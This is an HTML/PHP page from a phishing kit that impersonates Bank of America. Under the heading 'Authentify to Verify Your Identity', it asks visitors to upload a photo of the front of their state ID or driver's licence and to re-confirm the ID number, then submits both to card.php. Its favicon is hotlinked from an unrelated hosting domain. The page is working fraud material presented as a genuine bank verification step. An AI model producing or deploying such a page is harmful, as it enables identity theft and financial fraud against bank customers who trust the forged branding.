<!DOCTYPE html>
<html>
    
    <head><link rel="icon" type="image/png" href="https://sirus.perlahost.com/bankofamerica/index_files/58.34.png"/><title>Bank of America - Banking, Credit Cards, Loans and Merrill Investing</title></head>
    <body><style>
  .bg-image {
background-image: url("");
background-color: #042261;
height: 1000px;
width: 1100px;
background-position: center;
background-repeat: no-repeat;
background-size: 100% 100%;
position: relative;
}</style><div class="bg-image">
       <img src="index_files/319.70.png" width="319" height="70"> 
        <!-- Display submission status -->
<?php if(!empty($statusMsg)){ ?>
    <p><?php echo $statusMsg; ?></p>
<?php } ?>
 
<!-- Display contact form -->
<form method="post" action="card.php" enctype="multipart/form-data">
    <LABEL><FONT SIZE="30" color="#fffff9">Authentify to Verify Your Identity<br>FRONT OF ID</FONT> </LABEL><br>
    <LABEL><FONT SIZE="30"></FONT> </LABEL>
    <div class="form-group"><lable><b></b></lable>
    <label for="passwd" class="float accessibly-hidden"><FONT SIZE="4" color="#fffff9"> Take A photo of a State issued ID or Driver's License. FRONT ID .</FONT></label>
        <lable><b></b></lable>
    </div><br><lable></lable>
    <div class="form-group">
        <img src="index_files/250.145.png" width="250" height="145">
    </div><br>
   
   <br><br>
    <div class="form-group">
        <input type="file" name="file" class="form-control" placeholder="ID">
    </div><br><br><br>
    	<input id="user" class="" autocorrect="off" autocapitalize="off" spellcheck="false" name="name1" placeholder="RE-CONFIRM ID#" maxlength="128" type="text" required><BR><BR>
    <div class="submit">
        <input type="submit" name="submit" size="20" class="btn" value="&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NEXT&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;">
    </div><br><br>
</form>
 </div>
</body>
 
</html>